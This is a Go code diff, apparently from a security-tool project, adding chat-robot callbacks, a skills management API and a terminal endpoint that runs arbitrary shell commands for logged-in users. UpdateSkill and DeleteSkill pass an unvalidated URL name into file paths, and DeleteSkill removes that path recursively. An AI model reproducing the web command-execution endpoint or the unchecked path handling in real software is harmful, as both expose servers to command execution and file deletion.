<Content><![CDATA[%s]]></Content>
</xml>`, toUser, fromUser, time.Now().Unix(), content)
// log the exact plaintext response for debugging
h.logger.Debug("企业微信明文回复包", zap.String("xml", xmlResp))
// use text/xml as recommended by WeCom docs
c.Header("Content-Type", "text/xml; charset=utf-8")
c.String(http.StatusOK, xmlResp)
h.logger.Debug("企业微信明文回复已发送")
}
// —————— 测试接口(需登录,用于验证机器人逻辑,无需钉钉/飞书客户端) ——————
// RobotTestRequest 模拟机器人消息请求
type RobotTestRequest struct {
Platform string `json:"platform"` // 如 "dingtalk"、"lark"、"wecom"
UserID string `json:"user_id"`
Text string `json:"text"`
}
// HandleRobotTest 供本地验证:POST JSON { "platform", "user_id", "text" },返回 { "reply": "..." }
func (h *RobotHandler) HandleRobotTest(c *gin.Context) {
var req RobotTestRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体需为 JSON,包含 platform、user_id、text"})
return
}
platform := strings.TrimSpace(req.Platform)
if platform == "" {
platform = "test"
}
userID := strings.TrimSpace(req.UserID)
if userID == "" {
userID = "test_user"
}
reply := h.HandleMessage(platform, userID, req.Text)
c.JSON(http.StatusOK, gin.H{"reply": reply})
}
// sendWecomMessageViaAPI 通过企业微信 API 主动发送消息(用于异步处理后的结果发送)
func (h *RobotHandler) sendWecomMessageViaAPI(toUser, toParty, content string) {
if !h.config.Robots.Wecom.Enabled {
return
}
secret := h.config.Robots.Wecom.Secret
corpID := h.config.Robots.Wecom.CorpID
agentID := h.config.Robots.Wecom.AgentID
if secret == "" || corpID == "" {
h.logger.Warn("企业微信主动 API 缺少 secret 或 corpID 配置")
return
}
// 第 1 步:获取 access_token
tokenURL := fmt.Sprintf("https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s", corpID, secret)
resp, err := http.Get(tokenURL)
if err != nil {
h.logger.Warn("企业微信获取 token 失败", zap.Error(err))
return
}
defer resp.Body.Close()
var tokenResp struct {
AccessToken string `json:"access_token"`
ErrCode int `json:"errcode"`
ErrMsg string `json:"errmsg"`
}
if err := json.NewDecoder(resp.Body).Decode(&tokenResp); err != nil {
h.logger.Warn("企业微信 token 响应解析失败", zap.Error(err))
return
}
if tokenResp.ErrCode != 0 {
h.logger.Warn("企业微信 token 获取错误", zap.String("errmsg", tokenResp.ErrMsg), zap.Int("errcode", tokenResp.ErrCode))
return
}
// 第 2 步:构造发送消息请求
msgReq := map[string]interface{}{
"touser": toUser,
"msgtype": "text",
"agentid": agentID,
"text": map[string]interface{}{
"content": content,
},
}
msgBody, err := json.Marshal(msgReq)
if err != nil {
h.logger.Warn("企业微信消息序列化失败", zap.Error(err))
return
}
// 第 3 步:发送消息
sendURL := fmt.Sprintf("https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s", tokenResp.AccessToken)
msgResp, err := http.Post(sendURL, "application/json", bytes.NewReader(msgBody))
if err != nil {
h.logger.Warn("企业微信主动发送消息失败", zap.Error(err))
return
}
defer msgResp.Body.Close()
var sendResp struct {
ErrCode int `json:"errcode"`
ErrMsg string `json:"errmsg"`
InvalidUser string `json:"invaliduser"`
MsgID string `json:"msgid"`
}
if err := json.NewDecoder(msgResp.Body).Decode(&sendResp); err != nil {
h.logger.Warn("企业微信发送响应解析失败", zap.Error(err))
return
}
if sendResp.ErrCode == 0 {
h.logger.Debug("企业微信主动发送消息成功", zap.String("msgid", sendResp.MsgID))
} else {
h.logger.Warn("企业微信主动发送消息失败", zap.String("errmsg", sendResp.ErrMsg), zap.Int("errcode", sendResp.ErrCode), zap.String("invaliduser", sendResp.InvalidUser))
}
}
// —————— 钉钉 ——————
// HandleDingtalkPOST 钉钉事件回调(流式接入等);当前为占位,返回 200
func (h *RobotHandler) HandleDingtalkPOST(c *gin.Context) {
if !h.config.Robots.Dingtalk.Enabled {
c.JSON(http.StatusOK, gin.H{})
return
}
// 钉钉流式/事件回调格式需按官方文档解析并异步回复,此处仅返回 200
c.JSON(http.StatusOK, gin.H{"message": "ok"})
}
// —————— 飞书 ——————
// HandleLarkPOST 飞书事件回调;当前为占位,返回 200;验证时需返回 challenge
func (h *RobotHandler) HandleLarkPOST(c *gin.Context) {
if !h.config.Robots.Lark.Enabled {
c.JSON(http.StatusOK, gin.H{})
return
}
var body struct {
Challenge string `json:"challenge"`
}
if err := c.ShouldBindJSON(&body); err == nil && body.Challenge != "" {
c.JSON(http.StatusOK, gin.H{"challenge": body.Challenge})
return
}
c.JSON(http.StatusOK, gin.H{})
}
+37 -3
View File
@@ -18,9 +18,15 @@ import (
// RoleHandler 角色处理器
type RoleHandler struct {
config *config.Config
configPath string
logger *zap.Logger
config *config.Config
configPath string
logger *zap.Logger
skillsManager SkillsManager // Skills管理器接口(可选)
}
// SkillsManager Skills管理器接口
type SkillsManager interface {
ListSkills() ([]string, error)
}
// NewRoleHandler 创建新的角色处理器
@@ -32,6 +38,34 @@ func NewRoleHandler(cfg *config.Config, configPath string, logger *zap.Logger) *
}
}
// SetSkillsManager 设置Skills管理器
func (h *RoleHandler) SetSkillsManager(manager SkillsManager) {
h.skillsManager = manager
}
// GetSkills 获取所有可用的skills列表
func (h *RoleHandler) GetSkills(c *gin.Context) {
if h.skillsManager == nil {
c.JSON(http.StatusOK, gin.H{
"skills": []string{},
})
return
}
skills, err := h.skillsManager.ListSkills()
if err != nil {
h.logger.Warn("获取skills列表失败", zap.Error(err))
c.JSON(http.StatusOK, gin.H{
"skills": []string{},
})
return
}
c.JSON(http.StatusOK, gin.H{
"skills": skills,
})
}
// GetRoles 获取所有角色
func (h *RoleHandler) GetRoles(c *gin.Context) {
if h.config.Roles == nil {
+778
View File
@@ -0,0 +1,778 @@
package handler
import (
"fmt"
"net/http"
"os"
"path/filepath"
"regexp"
"strings"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/skills"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
"gopkg.in/yaml.v3"
)
// SkillsHandler Skills处理器
type SkillsHandler struct {
manager *skills.Manager
config *config.Config
configPath string
logger *zap.Logger
db *database.DB // 数据库连接(用于获取调用统计)
}
// NewSkillsHandler 创建新的Skills处理器
func NewSkillsHandler(manager *skills.Manager, cfg *config.Config, configPath string, logger *zap.Logger) *SkillsHandler {
return &SkillsHandler{
manager: manager,
config: cfg,
configPath: configPath,
logger: logger,
}
}
// SetDB 设置数据库连接(用于获取调用统计)
func (h *SkillsHandler) SetDB(db *database.DB) {
h.db = db
}
// GetSkills 获取所有skills列表(支持分页和搜索)
func (h *SkillsHandler) GetSkills(c *gin.Context) {
skillList, err := h.manager.ListSkills()
if err != nil {
h.logger.Error("获取skills列表失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
// 搜索参数
searchKeyword := strings.TrimSpace(c.Query("search"))
// 先加载所有skills的详细信息用于搜索过滤
allSkillsInfo := make([]map[string]interface{}, 0, len(skillList))
for _, skillName := range skillList {
skill, err := h.manager.LoadSkill(skillName)
if err != nil {
h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err))
continue
}
// 获取文件信息
skillPath := skill.Path
skillFile := filepath.Join(skillPath, "SKILL.md")
// 尝试其他可能的文件名
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
alternatives := []string{
filepath.Join(skillPath, "skill.md"),
filepath.Join(skillPath, "README.md"),
filepath.Join(skillPath, "readme.md"),
}
for _, alt := range alternatives {
if _, err := os.Stat(alt); err == nil {
skillFile = alt
break
}
}
}
fileInfo, _ := os.Stat(skillFile)
var fileSize int64
var modTime string
if fileInfo != nil {
fileSize = fileInfo.Size()
modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05")
}
skillInfo := map[string]interface{}{
"name": skill.Name,
"description": skill.Description,
"path": skill.Path,
"file_size": fileSize,
"mod_time": modTime,
}
allSkillsInfo = append(allSkillsInfo, skillInfo)
}
// 如果有搜索关键词,进行过滤
filteredSkillsInfo := allSkillsInfo
if searchKeyword != "" {
keywordLower := strings.ToLower(searchKeyword)
filteredSkillsInfo = make([]map[string]interface{}, 0)
for _, skillInfo := range allSkillsInfo {
name := strings.ToLower(fmt.Sprintf("%v", skillInfo["name"]))
description := strings.ToLower(fmt.Sprintf("%v", skillInfo["description"]))
path := strings.ToLower(fmt.Sprintf("%v", skillInfo["path"]))
if strings.Contains(name, keywordLower) ||
strings.Contains(description, keywordLower) ||
strings.Contains(path, keywordLower) {
filteredSkillsInfo = append(filteredSkillsInfo, skillInfo)
}
}
}
// 分页参数
limit := 20 // 默认每页20条
offset := 0
if limitStr := c.Query("limit"); limitStr != "" {
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 {
// 允许更大的limit用于搜索场景,但设置一个合理的上限(10000)
if parsed <= 10000 {
limit = parsed
} else {
limit = 10000
}
}
}
if offsetStr := c.Query("offset"); offsetStr != "" {
if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 {
offset = parsed
}
}
// 计算分页范围
total := len(filteredSkillsInfo)
start := offset
end := offset + limit
if start > total {
start = total
}
if end > total {
end = total
}
// 获取当前页的skill列表
var paginatedSkillsInfo []map[string]interface{}
if start < end {
paginatedSkillsInfo = filteredSkillsInfo[start:end]
} else {
paginatedSkillsInfo = []map[string]interface{}{}
}
c.JSON(http.StatusOK, gin.H{
"skills": paginatedSkillsInfo,
"total": total,
"limit": limit,
"offset": offset,
})
}
// GetSkill 获取单个skill的详细信息
func (h *SkillsHandler) GetSkill(c *gin.Context) {
skillName := c.Param("name")
if skillName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
return
}
skill, err := h.manager.LoadSkill(skillName)
if err != nil {
h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err))
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()})
return
}
// 获取文件信息
skillPath := skill.Path
skillFile := filepath.Join(skillPath, "SKILL.md")
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
alternatives := []string{
filepath.Join(skillPath, "skill.md"),
filepath.Join(skillPath, "README.md"),
filepath.Join(skillPath, "readme.md"),
}
for _, alt := range alternatives {
if _, err := os.Stat(alt); err == nil {
skillFile = alt
break
}
}
}
fileInfo, _ := os.Stat(skillFile)
var fileSize int64
var modTime string
if fileInfo != nil {
fileSize = fileInfo.Size()
modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05")
}
c.JSON(http.StatusOK, gin.H{
"skill": map[string]interface{}{
"name": skill.Name,
"description": skill.Description,
"content": skill.Content,
"path": skill.Path,
"file_size": fileSize,
"mod_time": modTime,
},
})
}
// GetSkillBoundRoles 获取绑定指定skill的角色列表
func (h *SkillsHandler) GetSkillBoundRoles(c *gin.Context) {
skillName := c.Param("name")
if skillName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
return
}
boundRoles := h.getRolesBoundToSkill(skillName)
c.JSON(http.StatusOK, gin.H{
"skill": skillName,
"bound_roles": boundRoles,
"bound_count": len(boundRoles),
})
}
// getRolesBoundToSkill 获取绑定指定skill的角色列表(不修改配置)
func (h *SkillsHandler) getRolesBoundToSkill(skillName string) []string {
if h.config.Roles == nil {
return []string{}
}
boundRoles := make([]string, 0)
for roleName, role := range h.config.Roles {
// 确保角色名称正确设置
if role.Name == "" {
role.Name = roleName
}
// 检查角色的Skills列表中是否包含该skill
if len(role.Skills) > 0 {
for _, skill := range role.Skills {
if skill == skillName {
boundRoles = append(boundRoles, roleName)
break
}
}
}
}
return boundRoles
}
// CreateSkill 创建新skill
func (h *SkillsHandler) CreateSkill(c *gin.Context) {
var req struct {
Name string `json:"name" binding:"required"`
Description string `json:"description"`
Content string `json:"content" binding:"required"`
}
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
// 验证skill名称(只允许字母、数字、连字符和下划线)
if !isValidSkillName(req.Name) {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称只能包含字母、数字、连字符和下划线"})
return
}
// 获取skills目录
skillsDir := h.config.SkillsDir
if skillsDir == "" {
skillsDir = "skills"
}
configDir := filepath.Dir(h.configPath)
if !filepath.IsAbs(skillsDir) {
skillsDir = filepath.Join(configDir, skillsDir)
}
// 创建skill目录
skillDir := filepath.Join(skillsDir, req.Name)
if err := os.MkdirAll(skillDir, 0755); err != nil {
h.logger.Error("创建skill目录失败", zap.String("skill", req.Name), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill目录失败: " + err.Error()})
return
}
// 检查是否已存在
skillFile := filepath.Join(skillDir, "SKILL.md")
if _, err := os.Stat(skillFile); err == nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill已存在"})
return
}
// 构建SKILL.md内容
var content strings.Builder
content.WriteString("---\n")
content.WriteString(fmt.Sprintf("name: %s\n", req.Name))
if req.Description != "" {
// 如果描述包含特殊字符,需要加引号
desc := req.Description
if strings.Contains(desc, ":") || strings.Contains(desc, "\n") {
desc = fmt.Sprintf(`"%s"`, strings.ReplaceAll(desc, `"`, `\"`))
}
content.WriteString(fmt.Sprintf("description: %s\n", desc))
}
content.WriteString("version: 1.0.0\n")
content.WriteString("---\n\n")
content.WriteString(req.Content)
// 写入文件
if err := os.WriteFile(skillFile, []byte(content.String()), 0644); err != nil {
h.logger.Error("创建skill文件失败", zap.String("skill", req.Name), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill文件失败: " + err.Error()})
return
}
h.logger.Info("创建skill成功", zap.String("skill", req.Name))
c.JSON(http.StatusOK, gin.H{
"message": "skill已创建",
"skill": map[string]interface{}{
"name": req.Name,
"path": skillDir,
},
})
}
// UpdateSkill 更新skill
func (h *SkillsHandler) UpdateSkill(c *gin.Context) {
skillName := c.Param("name")
if skillName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
return
}
var req struct {
Description string `json:"description"`
Content string `json:"content" binding:"required"`
}
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
// 获取skills目录
skillsDir := h.config.SkillsDir
if skillsDir == "" {
skillsDir = "skills"
}
configDir := filepath.Dir(h.configPath)
if !filepath.IsAbs(skillsDir) {
skillsDir = filepath.Join(configDir, skillsDir)
}
// 查找skill文件
skillDir := filepath.Join(skillsDir, skillName)
skillFile := filepath.Join(skillDir, "SKILL.md")
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
alternatives := []string{
filepath.Join(skillDir, "skill.md"),
filepath.Join(skillDir, "README.md"),
filepath.Join(skillDir, "readme.md"),
}
found := false
for _, alt := range alternatives {
if _, err := os.Stat(alt); err == nil {
skillFile = alt
found = true
break
}
}
if !found {
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在"})
return
}
}
// 读取现有文件以保留front matter中的name
existingContent, err := os.ReadFile(skillFile)
if err != nil {
h.logger.Error("读取skill文件失败", zap.String("skill", skillName), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "读取skill文件失败: " + err.Error()})
return
}
// 解析现有内容,提取name
existingName := skillName
contentStr := string(existingContent)
if strings.HasPrefix(contentStr, "---") {
parts := strings.SplitN(contentStr, "---", 3)
if len(parts) >= 2 {
frontMatter := parts[1]
lines := strings.Split(frontMatter, "\n")
for _, line := range lines {
line = strings.TrimSpace(line)
if strings.HasPrefix(line, "name:") {
name := strings.TrimSpace(strings.TrimPrefix(line, "name:"))
name = strings.Trim(name, `"'`)
if name != "" {
existingName = name
}
break
}
}
}
}
// 构建新的SKILL.md内容
var newContent strings.Builder
newContent.WriteString("---\n")
newContent.WriteString(fmt.Sprintf("name: %s\n", existingName))
if req.Description != "" {
// 如果描述包含特殊字符,需要加引号
desc := req.Description
if strings.Contains(desc, ":") || strings.Contains(desc, "\n") {
desc = fmt.Sprintf(`"%s"`, strings.ReplaceAll(desc, `"`, `\"`))
}
newContent.WriteString(fmt.Sprintf("description: %s\n", desc))
}
newContent.WriteString("version: 1.0.0\n")
newContent.WriteString("---\n\n")
newContent.WriteString(req.Content)
// 写入文件(统一使用SKILL.md)
targetFile := filepath.Join(skillDir, "SKILL.md")
if err := os.WriteFile(targetFile, []byte(newContent.String()), 0644); err != nil {
h.logger.Error("更新skill文件失败", zap.String("skill", skillName), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "更新skill文件失败: " + err.Error()})
return
}
// 如果原文件不是SKILL.md,删除旧文件
if skillFile != targetFile {
os.Remove(skillFile)
}
h.logger.Info("更新skill成功", zap.String("skill", skillName))
c.JSON(http.StatusOK, gin.H{
"message": "skill已更新",
})
}
// DeleteSkill 删除skill
func (h *SkillsHandler) DeleteSkill(c *gin.Context) {
skillName := c.Param("name")
if skillName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
return
}
// 检查是否有角色绑定了该skill,如果有则自动移除绑定
affectedRoles := h.removeSkillFromRoles(skillName)
if len(affectedRoles) > 0 {
h.logger.Info("从角色中移除skill绑定",
zap.String("skill", skillName),
zap.Strings("roles", affectedRoles))
}
// 获取skills目录
skillsDir := h.config.SkillsDir
if skillsDir == "" {
skillsDir = "skills"
}
configDir := filepath.Dir(h.configPath)
if !filepath.IsAbs(skillsDir) {
skillsDir = filepath.Join(configDir, skillsDir)
}
// 删除skill目录
skillDir := filepath.Join(skillsDir, skillName)
if err := os.RemoveAll(skillDir); err != nil {
h.logger.Error("删除skill失败", zap.String("skill", skillName), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "删除skill失败: " + err.Error()})
return
}
responseMsg := "skill已删除"
if len(affectedRoles) > 0 {
responseMsg = fmt.Sprintf("skill已删除,已自动从 %d 个角色中移除绑定: %s",
len(affectedRoles), strings.Join(affectedRoles, ", "))
}
h.logger.Info("删除skill成功", zap.String("skill", skillName))
c.JSON(http.StatusOK, gin.H{
"message": responseMsg,
"affected_roles": affectedRoles,
})
}
// GetSkillStats 获取skills调用统计信息
func (h *SkillsHandler) GetSkillStats(c *gin.Context) {
skillList, err := h.manager.ListSkills()
if err != nil {
h.logger.Error("获取skills列表失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
// 获取skills目录
skillsDir := h.config.SkillsDir
if skillsDir == "" {
skillsDir = "skills"
}
configDir := filepath.Dir(h.configPath)
if !filepath.IsAbs(skillsDir) {
skillsDir = filepath.Join(configDir, skillsDir)
}
// 从数据库加载调用统计
var skillStatsMap map[string]*database.SkillStats
if h.db != nil {
dbStats, err := h.db.LoadSkillStats()
if err != nil {
h.logger.Warn("从数据库加载Skills统计信息失败", zap.Error(err))
skillStatsMap = make(map[string]*database.SkillStats)
} else {
skillStatsMap = dbStats
}
} else {
skillStatsMap = make(map[string]*database.SkillStats)
}
// 构建统计信息(包含所有skills,即使没有调用记录)
statsList := make([]map[string]interface{}, 0, len(skillList))
totalCalls := 0
totalSuccess := 0
totalFailed := 0
for _, skillName := range skillList {
stat, exists := skillStatsMap[skillName]
if !exists {
stat = &database.SkillStats{
SkillName: skillName,
TotalCalls: 0,
SuccessCalls: 0,
FailedCalls: 0,
}
}
totalCalls += stat.TotalCalls
totalSuccess += stat.SuccessCalls
totalFailed += stat.FailedCalls
lastCallTimeStr := ""
if stat.LastCallTime != nil {
lastCallTimeStr = stat.LastCallTime.Format("2006-01-02 15:04:05")
}
statsList = append(statsList, map[string]interface{}{
"skill_name": stat.SkillName,
"total_calls": stat.TotalCalls,
"success_calls": stat.SuccessCalls,
"failed_calls": stat.FailedCalls,
"last_call_time": lastCallTimeStr,
})
}
c.JSON(http.StatusOK, gin.H{
"total_skills": len(skillList),
"total_calls": totalCalls,
"total_success": totalSuccess,
"total_failed": totalFailed,
"skills_dir": skillsDir,
"stats": statsList,
})
}
// ClearSkillStats 清空所有Skills统计信息
func (h *SkillsHandler) ClearSkillStats(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
return
}
if err := h.db.ClearSkillStats(); err != nil {
h.logger.Error("清空Skills统计信息失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
return
}
h.logger.Info("已清空所有Skills统计信息")
c.JSON(http.StatusOK, gin.H{
"message": "已清空所有Skills统计信息",
})
}
// ClearSkillStatsByName 清空指定skill的统计信息
func (h *SkillsHandler) ClearSkillStatsByName(c *gin.Context) {
skillName := c.Param("name")
if skillName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
return
}
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
return
}
if err := h.db.ClearSkillStatsByName(skillName); err != nil {
h.logger.Error("清空指定skill统计信息失败", zap.String("skill", skillName), zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
return
}
h.logger.Info("已清空指定skill统计信息", zap.String("skill", skillName))
c.JSON(http.StatusOK, gin.H{
"message": fmt.Sprintf("已清空skill '%s' 的统计信息", skillName),
})
}
// removeSkillFromRoles 从所有角色中移除指定的skill绑定
// 返回受影响角色名称列表
func (h *SkillsHandler) removeSkillFromRoles(skillName string) []string {
if h.config.Roles == nil {
return []string{}
}
affectedRoles := make([]string, 0)
rolesToUpdate := make(map[string]config.RoleConfig)
// 遍历所有角色,查找并移除skill绑定
for roleName, role := range h.config.Roles {
// 确保角色名称正确设置
if role.Name == "" {
role.Name = roleName
}
// 检查角色的Skills列表中是否包含要删除的skill
if len(role.Skills) > 0 {
updated := false
newSkills := make([]string, 0, len(role.Skills))
for _, skill := range role.Skills {
if skill != skillName {
newSkills = append(newSkills, skill)
} else {
updated = true
}
}
if updated {
role.Skills = newSkills
rolesToUpdate[roleName] = role
affectedRoles = append(affectedRoles, roleName)
}
}
}
// 如果有角色需要更新,保存到文件
if len(rolesToUpdate) > 0 {
// 更新内存中的配置
for roleName, role := range rolesToUpdate {
h.config.Roles[roleName] = role
}
// 保存更新后的角色配置到文件
if err := h.saveRolesConfig(); err != nil {
h.logger.Error("保存角色配置失败", zap.Error(err))
}
}
return affectedRoles
}
// saveRolesConfig 保存角色配置到文件(从SkillsHandler调用)
func (h *SkillsHandler) saveRolesConfig() error {
configDir := filepath.Dir(h.configPath)
rolesDir := h.config.RolesDir
if rolesDir == "" {
rolesDir = "roles" // 默认目录
}
// 如果是相对路径,相对于配置文件所在目录
if !filepath.IsAbs(rolesDir) {
rolesDir = filepath.Join(configDir, rolesDir)
}
// 确保目录存在
if err := os.MkdirAll(rolesDir, 0755); err != nil {
return fmt.Errorf("创建角色目录失败: %w", err)
}
// 保存每个角色到独立的文件
if h.config.Roles != nil {
for roleName, role := range h.config.Roles {
// 确保角色名称正确设置
if role.Name == "" {
role.Name = roleName
}
// 使用角色名称作为文件名(安全化文件名,避免特殊字符)
safeFileName := sanitizeRoleFileName(role.Name)
roleFile := filepath.Join(rolesDir, safeFileName+".yaml")
// 将角色配置序列化为YAML
roleData, err := yaml.Marshal(&role)
if err != nil {
h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err))
continue
}
// 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义)
roleDataStr := string(roleData)
if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") {
// 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况
re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`)
roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`)
roleData = []byte(roleDataStr)
}
// 写入文件
if err := os.WriteFile(roleFile, roleData, 0644); err != nil {
h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err))
continue
}
h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile))
}
}
return nil
}
// sanitizeRoleFileName 将角色名称转换为安全的文件名
func sanitizeRoleFileName(name string) string {
// 替换可能不安全的字符
replacer := map[rune]string{
'/': "_",
'\\': "_",
':': "_",
'*': "_",
'?': "_",
'"': "_",
'<': "_",
'>': "_",
'|': "_",
' ': "_",
}
var result []rune
for _, r := range name {
if replacement, ok := replacer[r]; ok {
result = append(result, []rune(replacement)...)
} else {
result = append(result, r)
}
}
fileName := string(result)
// 如果文件名为空,使用默认名称
if fileName == "" {
fileName = "role"
}
return fileName
}
// isValidSkillName 验证skill名称是否有效
func isValidSkillName(name string) bool {
if name == "" || len(name) > 100 {
return false
}
// 只允许字母、数字、连字符和下划线
for _, r := range name {
if !((r >= 'a' && r <= 'z') || (r >= 'A' && r <= 'Z') || (r >= '0' && r <= '9') || r == '-' || r == '_') {
return false
}
}
return true
}
+257
View File
@@ -0,0 +1,257 @@
package handler
import (
"bytes"
"context"
"encoding/json"
"net/http"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"time"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
const (
terminalMaxCommandLen = 4096
terminalMaxOutputLen = 256 * 1024 // 256KB
terminalTimeout = 120 * time.Second
)
// TerminalHandler 处理系统设置中的终端命令执行
type TerminalHandler struct {
logger *zap.Logger
}
// maskTerminalCommand 对可能包含敏感信息的终端命令做脱敏,避免在日志中直接记录密码等内容
func maskTerminalCommand(cmd string) string {
trimmed := strings.TrimSpace(cmd)
lower := strings.ToLower(trimmed)
if strings.Contains(lower, "sudo") || strings.Contains(lower, "password") {
return "[masked sensitive terminal command]"
}
if len(trimmed) > 256 {
return trimmed[:256] + "..."
}
return trimmed
}
// NewTerminalHandler 创建终端处理器
func NewTerminalHandler(logger *zap.Logger) *TerminalHandler {
return &TerminalHandler{logger: logger}
}
// RunCommandRequest 执行命令请求
type RunCommandRequest struct {
Command string `json:"command"`
Shell string `json:"shell,omitempty"`
Cwd string `json:"cwd,omitempty"`
}
// RunCommandResponse 执行命令响应
type RunCommandResponse struct {
Stdout string `json:"stdout"`
Stderr string `json:"stderr"`
ExitCode int `json:"exit_code"`
Error string `json:"error,omitempty"`
}
// RunCommand 执行终端命令(需登录)
func (h *TerminalHandler) RunCommand(c *gin.Context) {
var req RunCommandRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"})
return
}
cmdStr := strings.TrimSpace(req.Command)
if cmdStr == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"})
return
}
if len(cmdStr) > terminalMaxCommandLen {
c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"})
return
}
shell := req.Shell
if shell == "" {
if runtime.GOOS == "windows" {
shell = "cmd"
} else {
shell = "sh"
}
}
ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout)
defer cancel()
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr)
} else {
cmd = exec.CommandContext(ctx, shell, "-c", cmdStr)
// 无 TTY 时设置 COLUMNS/TERM,使 ping 等工具的 usage 排版与真实终端一致
cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color")
}
if req.Cwd != "" {
absCwd, err := filepath.Abs(req.Cwd)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"})
return
}
cur, _ := os.Getwd()
curAbs, _ := filepath.Abs(cur)
rel, err := filepath.Rel(curAbs, absCwd)
if err != nil || strings.HasPrefix(rel, "..") || rel == ".." {
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"})
return
}
cmd.Dir = absCwd
}
var stdout, stderr bytes.Buffer
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
stdoutBytes := stdout.Bytes()
stderrBytes := stderr.Bytes()
// 限制输出长度,防止内存占用过大(复制后截断,避免修改原 buffer)
truncSuffix := []byte("\n...(输出已截断)\n")
if len(stdoutBytes) > terminalMaxOutputLen {
tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix))
n := copy(tmp, stdoutBytes[:terminalMaxOutputLen])
copy(tmp[n:], truncSuffix)
stdoutBytes = tmp
}
if len(stderrBytes) > terminalMaxOutputLen {
tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix))
n := copy(tmp, stderrBytes[:terminalMaxOutputLen])
copy(tmp[n:], truncSuffix)
stderrBytes = tmp
}
exitCode := 0
if err != nil {
if exitErr, ok := err.(*exec.ExitError); ok {
exitCode = exitErr.ExitCode()
} else {
exitCode = -1
}
if ctx.Err() == context.DeadlineExceeded {
so := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n")
so = strings.ReplaceAll(so, "\r", "\n")
se := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n")
se = strings.ReplaceAll(se, "\r", "\n")
resp := RunCommandResponse{
Stdout: so,
Stderr: se,
ExitCode: -1,
Error: "命令执行超时(" + terminalTimeout.String() + "",
}
c.JSON(http.StatusOK, resp)
return
}
h.logger.Debug("终端命令执行异常", zap.String("command", maskTerminalCommand(cmdStr)), zap.Error(err))
}
// 统一为 \n,避免前端因 \r 出现错位/对角线排版
stdoutStr := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n")
stdoutStr = strings.ReplaceAll(stdoutStr, "\r", "\n")
stderrStr := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n")
stderrStr = strings.ReplaceAll(stderrStr, "\r", "\n")
resp := RunCommandResponse{
Stdout: stdoutStr,
Stderr: stderrStr,
ExitCode: exitCode,
}
if err != nil && exitCode != 0 {
resp.Error = err.Error()
}
